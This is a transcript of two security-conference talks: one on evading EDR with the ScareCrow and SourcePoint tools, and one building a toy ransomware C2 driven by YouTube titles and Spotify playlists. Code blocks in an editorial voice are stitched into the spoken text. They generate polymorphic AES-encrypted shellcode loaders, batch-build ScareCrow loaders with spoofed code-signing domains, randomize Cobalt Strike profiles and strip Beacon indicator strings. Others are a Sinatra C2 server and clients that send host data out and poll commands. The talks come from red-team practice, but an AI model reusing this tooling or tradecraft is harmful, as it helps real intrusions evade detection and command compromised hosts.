obfuscate, and it makes it harder for blue teams or even endpoint protection tools and anti-malware controls to detect. So if at all possible, avoid using PowerShell, because it's highly indicated and its indicators of compromise are clearly defined. So, some OPSEC considerations when we're building out these attack chains as well as our implants. First let's look at the implant itself. First, I always say encryption. Always use some sort of encryption; the stronger the encryption, the better. Sometimes I have discussions and people ask, well, what about base64 or something along those lines? That's fine, but it's by no means a replacement for encryption. It's great to use a combination: especially when you encrypt the string with AES or something like that, base64-encoding it afterwards makes it easier to store in your file, your loader. Now that being said, the next issue becomes avoiding static strings. This is a common thing that Yara rules or any type of blue team are looking for, something to write a rule or some kind of trigger on.
So if they can find a static string or a value that's always going to be the same, they will use that as a catalyst to create their rule for detection. This plays less to the EDR perspective and more to those SIEMs and SOCs, all that type of stuff. So I always like to say: make your loader as polymorphic as it can be, so that each time you generate it, it's always going to have different values, the strings are going to be different sizes, and everything like that. That just adds a level of entropy, making it harder to signature. You can see here, if you look at this example of a Yara rule, these opcodes and all these things: if these are static values, the chances are that when they match, there will be an alert. Also, if you can, depending on how fluent you are, using uncommon languages is a great way to add a layer of obfuscation to your loaders. The most common ones these days for tooling are C# and C++, but looking at things like Golang, Rust or F# can be very valuable, just as a natural way of obfuscating. More OPSEC considerations, now talking about the loader. This is where it becomes very much an art form, and situational. The key thing here is to understand your environment. What are you targeting? What controls do they have? Is there something that simply would not execute in that environment for a specific reason? More to the point, what are the products? Is it a thin client? Is it an endpoint that you're targeting? Is it a limited box, things like that? If you're going to use some kind of COM object or something along those lines: are those COM objects tied to Outlook or Word? They might not exist on a server. Those are things you need to be mindful of. Other things can be the file name: if your file name stands out as something very suspicious, that's one major thing; if it looks more like a program that would be found in an enterprise, that makes it easier to tell that story and, once again, blend in. As well as going deeper: look at the metadata, the attributes. You don't want your home computer name or your own personal name in the metadata. And that all comes down to how it looks on disk. If it's just a weird binary or something odd sitting on the desktop of someone's laptop, they might see it, as well as where you're executing it from: if you're executing from temp or appdata, it could be suspicious enough to warrant investigation. I called this out before, but strings: Microsoft is becoming more adept at looking for files that have large base64 strings. By breaking them up, it makes it harder to discern that this is definitely something suspicious, because there isn't one large string of code. And as always, binaries. I don't mean to beat up on them a lot, but binaries are really easy to detect. That's why, and we're going to talk about it right now, we're looking at new ways to load shellcode into memory.
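To make the "polymorphic, no static strings" advice above concrete, here is a small sketch of the kind of build-time step one might script: AES-encrypt the shellcode with a fresh key, base64 the result, and break it into randomly sized chunks under randomly generated variable names, so that no two generated loaders share a signaturable string. This uses the pyca/cryptography package and is a generic illustration, not how ScareCrow or any particular framework does it.

import base64, os, random, string
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

def rand_name(n=8):
    return "".join(random.choices(string.ascii_lowercase, k=n))

def build_loader_source(shellcode: bytes) -> str:
    key, nonce = os.urandom(32), os.urandom(16)          # fresh per build
    ct = Cipher(algorithms.AES(key), modes.CTR(nonce)).encryptor().update(shellcode)
    blob = base64.b64encode(ct).decode()

    # Split the base64 blob into randomly sized pieces held in random names,
    # so no large static string survives between two builds.
    pieces, i = [], 0
    while i < len(blob):
        step = random.randint(40, 120)
        pieces.append(blob[i:i + step])
        i += step
    var = rand_name()
    lines = [f'{var}_{n} = "{p}"' for n, p in enumerate(pieces)]
    joined = ", ".join(f"{var}_{n}" for n in range(len(pieces)))
    lines.append(f'{var} = "".join([{joined}])')
    lines.append(f'{var}_key   = {key!r}')
    lines.append(f'{var}_nonce = {nonce!r}')
    return "\n".join(lines)                              # embed in your loader template

print(build_loader_source(b"\x90" * 64))                 # dummy "shellcode"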
Threat groups around the world are starting to use this technique more and more in favor of traditional things like binaries or even process injection attacks This technique is simply the act of loading your DLL into a program, a legitimate program of that in a malicious way So how this can be, you know, an example can be with CPL files where when they are executed, if you execute your malicious CPL file, it will spawn run DLL, which is responsible for the control panel CPLs are controlled panel applets. So when you execute that binary, that CPL, I should say, it will spawn a run DLL process and that process will then load if it has the proper export functions That CPL file into memory and execute it. So what does that look like? It looks like run DLL legitimate process is loading something in You see this a lot with, you know, Redserver32 as well with DLLs, but it basically circumvents, and a lot of times whitelisting controls, because these are native to the Windows operating system These are things that are allowed. These are part of the system. They're not selling foreign, so they're often whitelisted. There's many of them, different types of silos I just use run DLL and register as the most common ones out there But what's great about these is once they're loaded in, your loader way that drops any type of dropper that drops that DLL or CPL, whichever catalyst you're using You can remove it and clean it up. So that way the process is there. It's running in memory and how you got it onto disk, how you got everything set up can be cleaned away and it's very effective So now let's talk about Scarecrow. Scarecrow is a framework I developed that actually performs a lot of the kind of techniques we've been talking about. So first and foremost, using custom system calls, it actually will reload NTDLL, kernel base and kernel 32 flushing out the EDR userland hooks in it. So there won't be any hooks It also encrypts the shellcode in an AES format. It patches ETW so that way there's no telemetry and it actually goes a step further and uses an alternative way to execute shellcode that's not standard So everything we've just kind of talked about, it's built in this framework. What it also does is those loaders, those files, whether it be a binary, a DLL, a JSCRIP file It spoof the attributes of ones that are legitimately found on the Windows environments, ranging from cmd.exe, word.exe to livecrypto.dll. All these values as well as allows you the ability to valently code sign by actually spoofing the attributes of a domain for a code signing cert I've provided a link and I'll provide it at the end to the framework. But talking about the loaders, there are several different ones here and I've kind of listed them out. So primarily it still does use binaries. There is a place still in the world for binaries But the control, the DLL, the Excel, MS, EXAC, and WSCRIP, these are all techniques to side load. So we already kind of talked about control and DLL, but the DLL is very polymorphic. It can be used for anything. It just generates a DLL and you can use it with any type of attack or exploit Excel, it actually will create an Excel plugin, once again with valid attributes and a code signing cert, and then uses JSCRIP to actually spawn Excel in the background and load this plugin into memory in a side loading technique I recently added MSI EXAC. This creates an MSI EXAC process and loads once again that DLL into memory. 
With wscript, it uses a technique called registration-free COM, which takes a manifest file; the manifest says, hey, you need to load this DLL into memory, and it provides the attributes and everything it needs to do so. So it will look for that DLL, which is our malicious DLL, and load it into memory. Now, because side loading has become so prevalent, and threat actors are using it in the wild more and more, EDRs are trying to combat it. You can see right here there was a "malicious module loaded" alert; they rank it as a high. But what are they actually looking at? Because this is a really hard thing to detect and stop. Simply put, from my investigations, they look for abnormal module behavior occurring in the process. What does that mean? Sometimes it can be as simple as two DLLs being loaded at the same time with the same name. Just by changing the name, there's no trigger anymore, there's no alert. So it really comes down to this: the technique is very valuable and really hard to detect. As such, ScareCrow ensures that the DLL names it loads in for the wscript, Excel, rundll32 and control panel loaders are not DLL names you would ever see already loaded in those processes, so this alert will never be triggered. So I wanted to provide some tips for using this framework. The first one is the loader flag. This flag stipulates what type of loader you're going to make. As we talked about, side-loading loaders are way better than binary-based loaders, simply because they can bypass whitelisting controls. If you don't fill this in, it will default to a binary, and that might break your success, so always make sure you know what you're using; don't just use the default. DLLs, like I said, have their place; they're really versatile, so they can be used with pretty much any type of attack. If you have a Metasploit module or another exploit that needs a DLL as a catalyst for your implant, this is where that feature really comes into play. The next one is the domain flag. This flag determines the domain you're going to use to spoof the code signing cert. Now, if you do have a valid code signing cert, you can enter it along with the password and it will use that to validly code sign. One thing, and it's a very common question I get, is that sometimes it doesn't work, you can't reach the domain when trying to sign, because wherever you're creating your loader, that host needs to be able to reach out to that domain. So if you're building from a host that has no access to that domain name, or the domain doesn't actually exist, that can be a problem. One thing I always want to stress is that when you're choosing the domain, never use the target company's domain. Very few companies, unless they're a big tech company that actually ships software, are going to have a code signing cert, and therefore they're typically not going to have one whitelisted in their own EDR products or across their enterprise. Think of things that are more common in the enterprise: everyone has networking vendors, everyone uses Windows, everyone uses those kinds of products. Those are the things that are going to give you a higher success rate when you're picking a domain.
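As a small convenience around the loader and domain flags just discussed, one could wrap ScareCrow in a batch build script so each engagement gets freshly generated loaders per loader type. The flag names below (-I, -Loader, -domain) follow ScareCrow's documented usage at the time of writing, but treat them as assumptions and check the README of your version before relying on them; the shellcode path and signing domain are placeholders.

import subprocess

SHELLCODE = "./beacon_x64.bin"
SIGN_DOMAIN = "www.example.com"   # replace with a reachable, plausible vendor domain
LOADERS = ["dll", "control", "excel", "msiexec", "wscript"]

for loader in LOADERS:
    cmd = ["./ScareCrow", "-I", SHELLCODE, "-Loader", loader, "-domain", SIGN_DOMAIN]
    print("[*] building:", " ".join(cmd))
    subprocess.run(cmd, check=True)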
The next thing is the delivery command. This is what we talked about: it is very, very dependent on what you're facing. Like I've been saying, LOLBins are great, but they also come with a high chance of detection, so they're a double-edged sword. The way I tell people is that HTAs are good, but macros and COM objects are better. Once again, that's fluid, it depends on the environment. The more information you get from your recon, the better it will tell you which one will work best. It's never going to be that this one is always the best; it's always going to be that this one is the best for this situation. And that situation can change client to client, network to network, enterprise to enterprise, security stack to security stack. You really want to then focus in on the user behavior. I always like to say that Sally from accounting does not know how to use certutil, so if you're trying to pretend to be Sally, maybe certutil is not the best thing for you to use; maybe it has to be a different way. And sometimes it can be as easy as this: if you have RDP-based access, it's next to impossible for any product to flag mouse clicks and keystrokes; there's no way to just determine that these are Sally's clicks and keyboard actions versus me as a malicious attacker. So when you're thinking about it, it really comes down to that story and what you have access to; the more you have, the better the story is. I also wanted to provide some sample commands to get the ideas going. The first one is just creating a signed binary with the ETW bypass; that's the first option. The second option is JScript. The JScript loaders are usually my favorite, they're my go-to: JScript is really great for getting through those network controls and landing on the environment. You see it right here with the domain flag and the loader set to control, with dash O. Then finally, the last one: wscript. Now, wscript is my go-to loader; with that manifest file it's very powerful and really hard to detect, but it might not be yours. Depending, once again, on the situation, a different loader might be better. Always keep that in mind when you're looking at these situations. So here we have a little example. We have our loader.js and it's going to spawn. If you look at the private bytes, you can see that value going up because our DLL is being side loaded into the process. Once it's finished loading, it will start executing: it will unhook all those DLLs, then decode the shellcode using custom system calls. Once that happens, it will use a different way to execute, giving us a remote shell. Here we can then enter commands without being detected. So now let's talk indicators of compromise. What are they? Simply put, they are pieces of data or artifacts that can help identify malicious activity. This can be related to attacks, post-exploitation techniques, data breaches, or even malware that we drop on environments. As our attacks become more advanced, IOCs are becoming more and more relied upon. This is the transition away from relying solely on an anti-malware control or an EDR product as your sole point of detection, towards a layered approach where you have a SIEM or a SOC analyzing all of this, to ensure that the behavior, or anything that's dropped, or anything that happens, is correlated to behavioral or known attack techniques.
And we should care about this because this is how the game is changing as we look at it. Defenders are learning from us. They're coming to our talks, they're reading our research, they're following whenever we come up with new techniques and then trying to figure out a signature to detect them. And as we modify our techniques, so do the IOCs. So if we are constantly evolving our tradecraft, we are circumventing those predefined IOCs that they're looking for, and once again that cat and mouse game is occurring. Simply put, if we can take that further by modifying how our C2 interacts, that's a great step towards keeping us always one step ahead of them. And threat actors are doing this with huge success. I'd like to give an example, using a Cobalt Strike C2 profile that didn't have beacon.dll stripped out. A phishing email contained a payload; when the user opened the file and enabled the macro, the shellcode executed. Great, the beacon called home, but any time a command was executed, the EDR would block the payload. By simply stripping things such as beacon and beacon.x64 out of the profile and retrying, the EDR did not catch on, because it was looking for that and didn't see beacon.dll in memory; therefore it didn't have enough data points to make the decision to terminate the process. That's just one example of how we can manipulate our C2 to avoid detection. Another one, once again looking at the human aspect, is user agent strings. Now, this only really comes into play over HTTP; if you're using DNS-based beacons, you don't need to worry about a user agent. Also, while we're on the subject, it's really good to avoid using raw TCP over the internet: it's very odd, it sticks out. If you're going across the internet, HTTPS is the best. But oftentimes the user agent string can be a dead giveaway. If it's something odd or weird or doesn't look normal, sometimes that's an indication that there's something to investigate. More mature companies can go as specific as, well, we're a Firefox shop, and then one day they start seeing Internet Explorer user agent strings; that stands out from the crowd, and that can be the IOC they start investigating on. So with all of this in mind, let me introduce a new tool I'll be releasing today called SourcePoint. SourcePoint is a tool that generates malleable C2 profiles for Cobalt Strike using all these features we've talked about and more. It ensures that each time you generate a profile, regardless of whether you put the same values in, the actual profile itself will be unique; you can generate multiple profiles using the same values and they'll be unique from each other. There are over 15 different customization options in this tool alone for you to select, but if you choose to leave them blank, they'll be randomly selected for you, so you're always ensuring a high level of entropy. Fifteen options can seem daunting, so there is YAML support; it's really handy to use a YAML file so you can always have your go-to template that you can start modifying. It is written in Go, and it simply uses a template-based language to generate these profiles. Some of the features it has: as I mentioned before, the user agent strings, there are over 60 of them, ranging from Windows 10, Windows 10 Chrome, Windows 10 IE, Firefox, Server, Mac, Linux. You get the picture, there's a lot of them.
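SourcePoint itself is written in Go, but the core idea described here, picking randomized values and rendering them into a profile template, is easy to illustrate. Below is a small hypothetical Ruby/ERB sketch of that idea; the user agents, value ranges and template fragment are examples, not SourcePoint's actual lists or output:

```ruby
# Render a tiny malleable-C2-style profile fragment with randomized values (illustrative only).
require 'erb'

USER_AGENTS = [
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0 Safari/537.36',
  'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0',
  'Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko'
]

values = {
  useragent: USER_AGENTS.sample,       # a different user agent each run
  sleeptime: rand(30_000..120_000),    # randomized sleep, in milliseconds
  jitter:    rand(10..40)              # randomized jitter percentage
}

template = <<~PROFILE
  set useragent "<%= values[:useragent] %>";
  set sleeptime "<%= values[:sleeptime] %>";
  set jitter    "<%= values[:jitter] %>";
PROFILE

puts ERB.new(template).result(binding)
```

Running it twice produces two different fragments even with the same inputs, which is the property being highlighted here.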
There are also different options for the PE header, with over 21 currently built in, and seven different types of profiles for your traffic to be shaped to. Right now it strips out 95 strings that EDRs use to look for and detect shellcode, especially around Cobalt Strike; you can see a large list of them right here. Usually the question I get is: well, there are options to obfuscate and encrypt, so why would I bother with this? All that stuff is a great way to avoid detection, but at some point the payload needs to be read and interpreted by the system, so it has to be in an unencrypted state to be processed properly, and that's when those detection alerts can be triggered. That's why, going through this, I've looked for the common indicators of compromise, looking for commonalities and the things defenders would look for, and just removed them. As I mentioned before, there is a lot of randomization, so the values for allocations and other features are always changing. Obviously there's sleep, jitter, your kind of standard things, but the more interesting thing is the manipulation of injection-based strings. For post-ex, there are 18 options. I'd also like to call out what we can see here: this is a great document, or image. If you haven't had a chance, please go ahead and look at it; it is basically a parent-child relation map of normal Windows processes. With this, when we're talking about post-ex or any type of spawn-to processes, especially for execute-assembly, we can map a process to a more realistic child process for spawning. It makes sense, it's harder to detect, and it doesn't stand out as much. SourcePoint has CDN support for anything you need around a CDN, depending on how you're setting up your C2, as well as allocation manipulation values, and it also supports SSL certificates. So why use it? It's been in development for several years and it's been deployed on hundreds of red team ops prior to today's public release. The most important thing, I would probably say, is unique profiles. If you're taking something static, or using the same profile over and over again for multiple engagements, eventually you're going to get caught and burned, especially if you're basing it off something public and you're not really modifying it extensively; chances are other people are downloading it and doing the same thing. So having completely unique profiles really does aid in, once again, keeping one step ahead of blue teams. Another reason is that it automates the process and basically reduces the overhead of building profiles and stripping these IOCs out of your C2. My personal favorite reason is human error. People make mistakes, I often make them; that's why I developed this, so I can do it once and have it automated. I couldn't show an example template because it would just run off the screen, and we could be here for hours going through all the different features. But to show you what the results look like from c2lint, you can see right here how it looks: all the different features, what it's done, the transformations, the values, and how it just really blends in.
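As a small illustration of that string-stripping idea (just a sketch, not SourcePoint's real list of 95 strings), a profile generator can simply emit a strrep transform in the stage block for every known indicator string:

```ruby
# Emit a malleable-C2-style stage block that blanks out a few well-known Beacon strings.
# The list here is a tiny illustrative subset, not the full set mentioned in the talk.
KNOWN_STRINGS = ['beacon.dll', 'beacon.x64.dll', 'ReflectiveLoader']

puts 'stage {'
KNOWN_STRINGS.each do |s|
  # Each strrep replaces an indicator string in the staged payload with an empty value
  puts %(    strrep "#{s}" "";)
end
puts '}'
```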
So, my final thoughts before we wrap up: we really need to, as red teamers, understand the blue team and their procedures better. From that we can understand how they're detecting us and what we can do to get around those detections. Simply put, blue teamers are attending our talks and reading our research; every time we publish something, they're reading it and learning it so they can fine-tune their own tradecraft to be better at detecting it. So we really need to do the same. That's how this cat and mouse game is going to keep going. Lastly, at the end of the day, for us to be better red teamers, we need to start learning blue. So, any questions? You can find the ScareCrow framework for bypassing EDRs and developing implants here. SourcePoint can be found on my GitHub along with the slides. If you have any questions or ever want to talk about this stuff, this is my passion, my bread and butter; I spend a lot of free time doing this, learning, and advancing my own tradecraft. So if you ever have a question or want to talk, feel free to reach out to me on my Twitter or my GitHub. Before I wrap up today, I just want to say thank you for attending my talk. Have a great day.
Endpoint Detection and Response (EDR) products have become the punching bags of the security world. Attackers employ sophisticated techniques to circumvent these controls and as a result, there has been a driving need for defenders to detect and prevent these attacks... but are they sufficient? This talk will go over all the operational considerations and tradecraft theory I've developed over the past few years when evading EDRs and other endpoint controls. This will primarily focus on techniques to ensure command and control servers are not easily detected and contain virtually no Indicators of Compromise. This talk will then deep dive into the inner workings of the EDR bypassing framework ScareCrow, highlighting some of the lesser-known techniques and new features that are available to red teamers and pentesters. By the end of this talk, the audience should walk away with a detailed understanding of how to use ScareCrow and other opsec considerations to avoid being detected by endpoint controls and blue teams.
10.5446/54349 (DOI)
Welcome to our talk, Everything is a C2 if you are brave enough, by Luis Angel Ramirez Mendoza and Mauro Eldridge from DC5411. Okay, before we start I would like to make a brief introduction about ourselves, the speakers, and about the topic of this talk, which is a rather crazy one. I would also like to take this chance to say that we are really happy to be here at the Adversary Village, and I really hope that you enjoy this talk as much as we have enjoyed making it; this was a really crazy thing for us. I'm Mauro Eldridge, I'm from Argentina, I am the founder of DCA and DC5411, the DEF CON group that comprises Argentina and Uruguay. I have spoken at different conferences before, including DEF CON a couple of times, and other conferences around the world including Russia, Brazil, Colombia, Iran, Spain, India, Pakistan, Panama, Peru, and there are more to come. My co-speaker today is Luis Angel Ramirez Mendoza, and he is going to introduce himself now. Thank you Mauro, hello everyone, my name is Luis Angel Ramirez Mendoza. I work on hardware security engineering and building cyber art, and I am a member of the DC5411 group. I have spoken at different conferences including DEF CON, Visayino Castle, India, BSides Islamabad in Pakistan, DragonJAR in Colombia, Creya in the USA, Jónico in Spain, Poccon in Iran, and Coesí in Peru. Thanks Luis. So the topic of this talk, as I said before, is a rather crazy one: we are going to try to demonstrate the most crazy, unexpected, and, you might call it, interesting ways of setting up a C2 server. We are going to use different platforms, different online profiles, certain streaming platforms, gaming platforms, and even video games to try to build a C2 server. Let me explain this: we tried to make this talk as friendly as possible to every audience, so we will explain this whole topic from scratch, the construction and use of a basic C2 server, and we are going to mutate this server to use different applications that are common to almost everyone here. The point is that we will start from a really basic C2 server and try to expand it to use different platforms. For this, we have created a fake, toy ransomware, which will try to call home, to leak some information, and to coordinate an attack, in this case an encryption operation, which we will see in a moment is not as dangerous as it seems. And it will try to use the most crazy and unexpected ways to carry out and communicate these actions. Just as a disclaimer: both the ransomware and the C2 samples here are unable to do any kind of damage to their targets; they have been built for educational purposes only and they can't do any damage at all, not even accidentally. These artifacts are not to be considered real-world samples, they are merely illustrative, so some features that may be present in large-scale, real-world tools or samples will be missing here; they won't be implemented. We haven't been involved in any kind of illegal activity, and it would be really hard to do so with these samples. So, let's start with the introduction and take a first glance at a basic C2 that we have built; from then on, if you have never seen one or have no idea of how a C2 works, you will have the basic knowledge to know what we are talking about. Then this talk will go in more bizarre directions, and we'll start seeing some crazy things. So the obvious question here is: what is a C2 server?
C2 stands for command and control server: it's a server controlled by a bad actor, an attacker, which is used mostly to coordinate and distribute orders to infected systems. These orders can carry out information leaks, lateral movement, encryption operations, and almost anything that you can picture in your head. This traffic, which is sent from an infected system to the command and control server, tends to be hidden; it tries to blend in among normal applications or other kinds of traffic to disguise itself, because otherwise it would be really easy to identify it, tag it, and block it. Now, there are different connection models which won't be discussed here, because we are trying to build something really basic just to give an example, but there's not a single way in which C2 servers behave. So for our example we set up, as I said before, a really basic C2 server and client, which will be able to do the following: register a new victim, that is, correctly identify a new victim, and generate and share an encryption key in order to encrypt this victim. Actually, this key won't be a real encryption key; it will be a public SSH key, which with the help of OpenSSL you can use to encrypt files and different things, but this is out of scope, we are not going to encrypt anything. It will then try to leak information from the target and then encrypt the target's file system, which is the final objective of this malware, but we are not actually going to encrypt anything, as I said before; we will only leave a ransom note on the desktop asking for a payment. And something that we are not going to do yet is disguise the traffic of this C2 server using another well-known application, service, or platform; not yet, as I said before. So it's crime time, and to make things funnier and stick closer to the real world, we will impersonate a new ransomware gang: we are going to be the Capybara gang, dedicated to stealing Capybara coins from unsuspecting victims. Our ransom notes will ask for payment in Capybara coins exclusively. Capybaras are the friendly and nice-looking lads that you can see in this picture, and they are common in Brazil, Uruguay, and Argentina. A curious piece of information is that the Capybara coins are something real: they are actual fiat currency, official currency in Uruguay, and they feature one of these lovely lads, which is obviously a valid enough reason to want all of them. So, back to the technical field: our server will use Ruby and Sinatra for establishing an API. Something that I must clarify here is that interpreted languages are not common, and I would risk saying that I don't think they are used at all in this kind of software, in this kind of malware, but it will be way more understandable to use this than any other language for this talk, believe me. We preferred to use Ruby because it helps us build something minimal, a minimal artifact, and the language is quite understandable for almost anybody, so we decided to stick to this rather than sticking to C or any other language. Let me explain the code really quickly: we require common libraries like Sinatra, and Colorize in order to be able to output colored output; the rest, Net::HTTP and URI, are part of the Ruby core. We define a password for our C2 server because we don't want anybody snooping around and stealing our complex C2 server.
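Since the actual code is only shown on screen during the talk, here is a minimal, hypothetical sketch of the kind of Sinatra API being described. The endpoint names, parameters, password and in-memory storage are illustrative assumptions, not the real Capybara sample, and the key-generation endpoint is omitted for brevity:

```ruby
# Minimal sketch of a toy C2 API in Sinatra (illustrative only, it does nothing harmful).
require 'sinatra'
require 'securerandom'
require 'json'

PASSWORD = 'adversary'   # assumed operator password, as in the talk's demo
VICTIMS  = {}            # in-memory "database" of registered victims

# Register a new victim and hand back an ID
post '/register' do
  id = SecureRandom.uuid
  VICTIMS[id] = { telemetry: nil, encrypt: false }
  { victim_id: id }.to_json
end

# Store the victim's leaked connection string (hostname/IP and port)
post '/telemetry/:id' do
  halt 404 unless VICTIMS.key?(params[:id])
  VICTIMS[params[:id]][:telemetry] = params[:connection]
  'ok'
end

# Operator endpoint: order "encryption" for every victim (password protected)
post '/order' do
  halt 401 unless params[:password] == PASSWORD
  VICTIMS.each_value { |v| v[:encrypt] = true }
  'sending the encrypt order to all'
end

# Victims poll this to know whether to drop the ransom note
get '/status/:id' do
  VICTIMS.fetch(params[:id], {})[:encrypt] ? 'encrypt' : 'wait'
end
```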
We define some really basic endpoints addressing the data needs from before: how to register and assign an ID to each victim; how to generate a key pair for each of them; and how to ask the host to leak specific information, in this case only an IP address and a port, sort of a connection string in order to get back from the server to the client. We also have an encrypt endpoint in order to notify that we are going to start encryption operations on a given client (again, this is not going to encrypt anything), and a last endpoint which will allow us to connect remotely to the compromised host, obviously using the information leaked before, the connection string that I mentioned. We are going to query the telemetry endpoint and issue a custom command; in this case we only have the encrypt command, nothing else, and obviously this will require a password, because we don't want anybody stealing our precious C2 server. The client is pretty simple again: it will query the server endpoints in order to do everything that we mentioned before, to register itself, to get a victim ID, to get a victim encryption key, and also to leak the compromised host's IP address and port in order to create the connection string that the server needs. Then, after running all this routine, it will place a ransom note once the server issues the encryption command. Now let's see how things turn out, and once you have this base and a good understanding of what we are doing here, we will move on to the wacky, or not so orthodox, methods. So let's start with the demo. Okay, as you can see here we have three different terminals. The one on the upper left is the C2 server; it's going to run the Capybara server. This other terminal will send the encrypt command once we have everything set and ready to go. And the lower one is a Docker container which, as it says here, is the victim. So we will basically run the server, run the client on the victim side, the client will register itself, and then, when everything seems nice and smooth, we will send the encrypt command from this terminal. Let's make it roll. Now it started on port 4567, and we are going to launch the client on the victim. Wait... oh, okay, now it should connect. The exchange should happen really fast here, and as you can see, it already happened, and it's already waiting for some input. The victim was registered, we have generated the key pair, and we have leaked the hostname and the connection string. In this case it's a Docker container, as I said before. It will start running a listener on port 1337, which is stated here in the connection string, and it will wait for input. Now we are going to send the encrypt command: we make a curl call, a POST with the order encrypt and the password adversary, as it says there. This should be enough to start the encryption operation. Okay, it's done: sending the encrypt order to all, attempting to encrypt this victim, fetching the endpoint. And now, if we go to the desktop, we should have a creepy ransom note if everything went smooth. Yeah, it's there.
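To round out the basic picture before the wacky clients, here is an equally hypothetical sketch of the client side just described, matching the endpoint names assumed in the server sketch above; all it does is poll and write a text file:

```ruby
# Toy client sketch: register, leak a fake connection string, poll for the encrypt order.
require 'net/http'
require 'json'
require 'socket'
require 'fileutils'

C2 = 'http://127.0.0.1:4567'   # assumed C2 address and port, as in the demo

id = JSON.parse(Net::HTTP.post(URI("#{C2}/register"), '').body)['victim_id']

# "Leak" the hostname and a listener port as a connection string
Net::HTTP.post_form(URI("#{C2}/telemetry/#{id}"),
                    'connection' => "#{Socket.gethostname}:1337")

# Poll until the operator sends the encrypt order, then just drop a ransom note
loop do
  if Net::HTTP.get(URI("#{C2}/status/#{id}")) == 'encrypt'
    desktop = File.join(Dir.home, 'Desktop')
    FileUtils.mkdir_p(desktop)
    File.write(File.join(desktop, 'RANSOM_NOTE.txt'),
               'Your files are "encrypted". Send Capybara coins!')
    break
  end
  sleep 5
end
```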
Now, what are these crooks up to? What do they want from us? Ah, I knew it from the start: they want our capybara coins. Okay, that's how the basic C2 interaction works. Now that you have seen how it behaves, we are going to move on to the not so orthodox methods. Remember, this is a basic diagram, once again, of what we have done so far: we have the client, which is the victim, the server, and the remote activator, which can reside inside the server itself if you want. So let's move on to the fun part now, the wacky clients: how to hide C2 traffic in the most unexpected, wacky, crazy ways that you can ever picture. So, what's next? So far our C2 is able to do a couple of things. Register a new victim: check. Share an encryption key: check. Leak information from the target: check. Encrypt, quote unquote, the target's file system: check. And now we have something pending: we have to disguise our traffic using some well-known applications, platforms, or services. So let's start doing that. This was the original inspiration for this talk: why not rely on YouTube and video naming for orchestrating our attack? Using YouTube's free API, we decided to create a video named after each minimal C2 command (execute start, get key, leak info, create sequence), with the content being nothing but the same frozen frame. For all of them we only care about the title, nothing else; only the get key video has its description set, for a reason. The client will look at the videos, which represent pre-loaded orders, and execute an order when the title matches a specific pattern. Existing videos can be removed, and new videos uploaded, via the YouTube API. This can be done with minimal effort and for free. So let's see how things turn out here, and obviously, if you like this video, don't forget to like and subscribe to our channel. Give me a second... okay, as you can see here, this is another Docker container, it won't be long. This is our channel, which is crowded with subscribers and a lot of people who are interested in our things; that's why we have so many visits on our videos. And I apologize for the interface being in Spanish. So let's start: we will show that the root and desktop folders are empty. That's our channel ID, which is what we query via the API, and we have the different videos that mean different orders; they are in reverse order here. So let's run the client: it found the channel, it found the videos, it already has access to read the titles, and that's all it needs. It doesn't need to watch the videos, it doesn't need to do anything else. It only asks for each one of these videos' titles, and for the description only when it needs the SSH key, which is on the get key video. That's right, there it is: it will take this description field and use it as the real encryption key. Now let's see what these crooks are up to: they have, once again, hacked us. Okay, so that's it for the YouTube client; this is a summary of how it works, it's quite simple. Remember that all of these samples will be available on GitHub after the talk, so don't worry if you want to test them. The only thing is that you will have to issue your own API keys, but that's not a problem, it's pretty easy to do.
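As a rough illustration of the idea (not the actual sample from the talk's GitHub; the channel ID, API key handling and the title-to-command mapping are placeholders), this is roughly how a client can read the latest video titles from a channel with the YouTube Data API v3:

```ruby
# Poll a channel's latest video titles via the YouTube Data API v3 and treat them as commands.
require 'net/http'
require 'json'

API_KEY    = ENV.fetch('YT_API_KEY')      # bring your own API key
CHANNEL_ID = 'UCxxxxxxxxxxxxxxxxxxxxxx'   # placeholder channel ID

uri = URI('https://www.googleapis.com/youtube/v3/search')
uri.query = URI.encode_www_form(
  key: API_KEY, channelId: CHANNEL_ID,
  part: 'snippet', order: 'date', maxResults: 10, type: 'video'
)

JSON.parse(Net::HTTP.get(uri))['items'].each do |item|
  title = item['snippet']['title']
  case title
  when 'execute start'   then puts 'sequence start'
  when 'get key'         then puts "key material: #{item['snippet']['description']}"
  when 'leak info'       then puts 'leaking (dummy) info'
  when 'create sequence' then puts 'sequence end'
  end
end
```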
So now let's move on to another client: the Spotify client. I think almost all of us know Spotify. We have been using their platform's free API to craft a special playlist that you can see here, the official Capybara Gang playlist. The title of this playlist is quite fishy, quite suspicious, but it hasn't been banned so far, so we're going to leave it as is. It is composed of four different sections: the first one is the wake word, hits; the second one is a dash-separated IP address for the C2 server; and the third and fourth are pieces of the encryption key. You might ask, why are you storing them there? Well, the description box contains the rest of the key, but it's split due to the length limitations that the field has, so we had to resort to this creative way of doing things, which in turn seems a little bit messy, but it works. The playlist is made up of different songs, obviously, but the important thing about these songs is their title: each title effectively represents one of the commands to be executed. Here we have added a couple of new commands, because this is a newer client that has been developed a little bit further. So, So Alive from Love and Rockets is the sequence start; Fix from The Sisters of Mercy is the command to fix the key, to start exchanging the keys and to reassemble the key; the next one, from KMFDM, is leak information; Tank! from Yoko Kanno and the Seatbelts is start encryption, or start the attack; and Adios from KMFDM is the sequence end. Then we have added a special case: I Started Something I Couldn't Finish from The Smiths actually means that we have interrupted jobs, and Asleep, from The Smiths again, is wait. These commands were implemented having in mind special needs from other users. So this is how the playlist will look; take a look at this. So Alive will be reflected here: sequence start. I Started Something I Couldn't Finish will say: warning, some previous jobs were interrupted. Fix: we try to recover the key. Tank!: we start the encryption cycle. Adios, which means goodbye in Spanish, will be the sequence end. So let's move on to the demo in order to see this in action, because it may seem a little bit crazy now but it's quite simple. Ah, before I forget: as with the YouTube client, these songs can be added and removed really easily using the platform's API. This takes minimal effort, it's really fast and free. So let's see now how things turn out, and if you like our musical taste, join the official Capybara Gang playlist. Okay, again we have the container, you know, the Docker container which is going to be the eternal victim. We have this playlist with these eight songs; let's see how they behave. It has already found our user and everything went really fast and smooth. We have found the tainted playlist and we started reading the commands. The C2 address is recovered from the playlist title, and the key is recovered from the title too. There are some unfinished jobs here, some interrupted jobs. Fix has already recovered the key and it looks to be good; remember that it's split into three parts. Now, okay, this part is from the description field. Now, we don't have information to leak; remember, this is a dummy command. We started the encryption cycle, which will only 